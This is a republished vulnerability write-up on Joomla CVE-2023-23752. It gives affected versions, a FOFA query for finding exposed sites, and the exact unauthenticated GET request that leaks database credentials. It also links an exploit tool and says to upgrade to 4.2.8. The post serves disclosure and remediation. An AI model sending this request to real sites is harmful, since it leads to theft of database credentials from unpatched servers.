Joomla has an unauthorized access vulnerability CVE-2023-23752

Enterprise 2023-08-26 00:28:47 views: null

Article directory

Joomla has an unauthorized access vulnerability CVE-2023-23752

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Introduction to Joomla Unauthorized Access Vulnerability

WeChat official account search: Nanfeng Vulnerability Reappearance Library
This article was first published on the Nanfeng Vulnerability Reproduction Library official account

Joomla is an open source, cross-platform content management system (CMS) developed by the Open Source Matters team in the United States using PHP and MySQL.

2. Vulnerability description

Joomla is an open source, cross-platform content management system (CMS) developed using PHP and MySQL. ApiRouter.php#parseApiRoute in Joomla 4.0.0 to 4.2.7 does not effectively filter the request parameters when processing the user's Get request, so that the attacker can send a request containing public=true parameters to the Joomla service endpoint (such as: / api/index.php/v1/config/application?public=true&key=value) for unauthorized access

CVE number: CVE-2023-23752
CNNVD number: CNNVD-202302-1375
CNVD number:

3. Affect the version

Joomla 4.0.0 to 4.2.7 has a security vulnerability

4. fofa query statement

app=“Joomla”

5. Vulnerability recurrence

Vulnerability link: http://xxxx.com/api/index.php/v1/config/application?public=true
Vulnerability data package:

GET http://xxxx.com/api/index.php/v1/config/application?public=true HTTP/1.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive

Leaking database usernames, passwords, hosts, etc.
Joomla has an unauthorized access vulnerability CVE-2023-23752

Exploitation tool: https://github.com/Pari-Malam/CVE-2023-23752
Joomla has an unauthorized access vulnerability CVE-2023-23752

6.POC&EXP

Exp tool address: https://github.com/Pari-Malam/CVE-2023-23752
If you can’t open GitHub, you can follow the official account Nanfeng Vulnerability Recurrence Library and reply Vulnerability Reproduce 33 to get the POC tool download address.

7. Rectification opinions

At present, the vulnerability has been fixed, and affected users can upgrade to Joomla! CMS version 4.2.8 in time.

8. Past review

Guess you like

Origin blog.csdn.net/nnn2188185/article/details/130798738
Recommended
微软回应中国区AI团队“打包赴美”传闻
Ranking
How to use ChatGPT to write 100,000+ hot articles for public accounts (includes prompt words)
sudo echo command execution Permission denied
ADO: Using Transactions to Operate Oracle Database
[Java] [Class and Object] equals, hashCode, clone methods
Linux virtual host function
Порт управления rabbitmq открыт
on,where
jQuery WeUI
How can there be a weed pilot in Hangzhou?
tcp / ip model four
Daily
More
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)

Code World

© 2018 codetd.com